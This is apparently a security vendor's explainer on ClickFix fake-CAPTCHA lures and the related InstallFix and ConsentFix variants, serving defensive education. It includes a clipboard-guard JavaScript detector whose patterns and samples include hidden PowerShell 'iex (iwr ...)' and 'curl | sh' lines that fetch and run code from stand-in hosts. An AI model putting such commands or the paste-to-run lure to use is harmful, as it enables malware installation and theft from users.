ClickFix makes malware installation feel like routine troubleshooting

ClickFix tricks users into installing malware themselves. A fake CAPTCHA copies a malicious command to the clipboard, and the user pastes it into their terminal to resolve what looks like a routine browser issue. The attack is over before anything looks suspicious.


How ClickFix attacks work

ClickFix lures are built to feel familiar. Fake CAPTCHAs and browser errors are styled to mimic the verification challenges users encounter every day. The mechanic is straightforward but highly effective.

1. The user lands on a compromised or malicious page and is prompted to complete a verification step.
2. Clicking the prompt copies a malicious command to the clipboard.
3. The user is instructed to open their terminal and paste the command to fix the issue.
4. The command executes using legitimate, pre-installed system utilities to pull down infostealer malware or a remote access tool.
5. Malware installs on the endpoint, and the user believes the verification completed successfully.
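The mechanic in steps 2 and 3 is a page writing a command to the clipboard and talking the user into running it. The following is an added example, not Push's code or anything from this page: a heuristic that scores clipboard-bound text for signs of a command meant to be pasted into a terminal or Run dialog, plus a wrapper that drops and reports such writes instead of copying them. The regular expressions, the `analyzeClipboardText` and `guardClipboard` names, and the sample strings are all assumptions constructed for illustration.

```javascript
// Added example (not Push's code). Heuristic scoring of text a page writes to
// the clipboard, flagging content that reads like a command the user is being
// told to paste and run, i.e. the ClickFix mechanic. The patterns below are an
// assumed, illustrative set, not a complete or authoritative signature list.
const SCRIPT_HOST = /\b(?:powershell|pwsh|cmd(?:\.exe)?|mshta|wscript|cscript)\b/i;
const REMOTE_SOURCE = /\b(?:https?|ftp):\/\/|\\\\[\w.-]+\\/i;   // URL or UNC path
const EVASION_FLAG =
  /-w(?:indowstyle)?\s+hidden|-enc(?:odedcommand)?\b|-nop(?:rofile)?\b|\biex\b|invoke-expression|-(?:ep|executionpolicy)\s+bypass/i;
const PIPE_TO_SHELL = /\|\s*(?:sh|bash|zsh|iex|powershell|pwsh)\b/i;

// Returns { suspicious, signals }. A bare interpreter name is common in
// legitimate documentation, so it is only flagged together with a remote
// source; piping into a shell or using hide/encode switches is flagged alone.
function analyzeClipboardText(text) {
  const signals = [];
  if (SCRIPT_HOST.test(text)) signals.push('script_host');
  if (REMOTE_SOURCE.test(text)) signals.push('remote_source');
  if (EVASION_FLAG.test(text)) signals.push('evasion_flag');
  if (PIPE_TO_SHELL.test(text)) signals.push('pipe_to_shell');
  const suspicious =
    signals.includes('pipe_to_shell') ||
    signals.includes('evasion_flag') ||
    (signals.includes('script_host') && signals.includes('remote_source'));
  return { suspicious, signals };
}

// Wraps a clipboard writer (navigator.clipboard in a page, a fake object in
// the demo) so that suspicious writes are reported and silently dropped;
// benign writes pass through to the original writeText unchanged.
function guardClipboard(clipboard, onAlert) {
  const originalWrite = clipboard.writeText.bind(clipboard);
  clipboard.writeText = function (text) {
    const value = String(text);
    const verdict = analyzeClipboardText(value);
    if (verdict.suspicious) {
      onAlert({ text: value, signals: verdict.signals });
      return Promise.resolve();   // nothing reaches the clipboard
    }
    return originalWrite(value);
  };
  return clipboard;
}

// Constructed sample inputs (not real lure content): a ClickFix-style command,
// a pipe-to-shell installer, an ordinary download command, and plain text.
const SAMPLES = [
  'powershell -w hidden -c "iex (iwr https://lure.example.invalid/v)"',
  'curl -fsSL https://get.example.invalid/install.sh | sh',
  'curl -L https://releases.example.invalid/tool.tar.gz -o tool.tar.gz',
  'Please complete the verification below.',
];

// Runs the guard over the samples with a fake clipboard and returns what was
// blocked and what was allowed through.
function runDemo() {
  const alerts = [];
  const fakeClipboard = {
    written: [],
    writeText(t) { this.written.push(t); return Promise.resolve(); },
  };
  guardClipboard(fakeClipboard, (a) => alerts.push(a));
  for (const s of SAMPLES) fakeClipboard.writeText(s);
  return { blocked: alerts.map((a) => a.text), allowed: fakeClipboard.written };
}

console.log(runDemo());
```

In the demo, the first two samples are blocked and the last two are allowed. A real deployment would call `guardClipboard(navigator.clipboard, reportToConsole)` from a browser extension, with the caveat that a content script runs in its own isolated world, so patching `navigator.clipboard` there does not intercept the page's own realm, and lures that copy through a `copy` event handler take a different path entirely. The heuristic is the transferable part; enforcement needs a vantage point that sees the page's actual clipboard write.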

The *Fix family keeps expanding. InstallFix, discovered by Push, clones developer tool installation pages and replaces the legitimate install commands with malicious ones, with the cloned pages delivered via Google Ads. ConsentFix, another Push discovery, goes fully browser-native: the victim pastes OAuth key material from a legitimate Microsoft page into a phishing site, handing over account access without ever touching the terminal. Four in five ClickFix payloads intercepted by Push arrived via search engines.

Why most security tools miss ClickFix

Endpoint tools are built around the assumption that malware arrives as a file. ClickFix turns this assumption on its head. The payload is executed by the user through a legitimate system utility, so there is no download to intercept or suspicious process to flag. Web sandboxes and email filters face the same problem when the delivery channel is a malicious ad or a compromised website rather than an attachment.

Browser-native variants like ConsentFix remove even the endpoint execution step, leaving traditional tools with nothing to act on. The attack completes inside the browser session, where most security tools have no visibility.

Block ClickFix attacks in the browser with Push

Push intercepts ClickFix and its variants at the source, before the user interacts with the lure, regardless of delivery channel. It identifies and blocks malicious pages as they load in the browser, whether the lure arrives through a search ad, a compromised site, or a messaging platform.

For browser-native variants like ConsentFix, where there is no endpoint activity to detect, browser visibility is the only reliable detection point. Push operates there by default.